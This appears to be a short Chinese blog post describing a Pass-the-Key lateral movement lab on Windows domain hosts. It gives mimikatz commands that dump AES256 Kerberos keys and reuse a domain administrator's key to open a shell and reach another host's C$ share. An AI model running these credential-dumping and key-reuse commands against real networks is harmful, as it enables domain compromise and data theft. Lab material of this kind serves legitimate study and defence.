Pass the key密钥传递攻击(PTK)横移

实验主机:Win2012,Win2008

1.Win2012登陆域管账号,Win2008登陆本地账号

2.Win2012域管账号远程Win2008的域账号,留下ticket

3.WIn2008开启mimikatz_x64.exe,输入sekurlsa::ekeys,查看aes256

sekurlsa::ekeys //查看aes256

(本来是有Win2012的aes256号的,Win2008由于版本原因看不到)

4.将Win2012administrator的aes256输入到mimikatz_x64.exe

sekurlsa::pth /user:administrator /domain:ctfstu.com /aes256:1282da3db4d52e0dda93af119fb933ef23fba44ed2959dc2b086825c5f68fcab

会弹出一个cmd命令框,这时可以直接输入dir \\PC2012.DAMN.com\C$查看Win2012C盘的共享文件夹

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值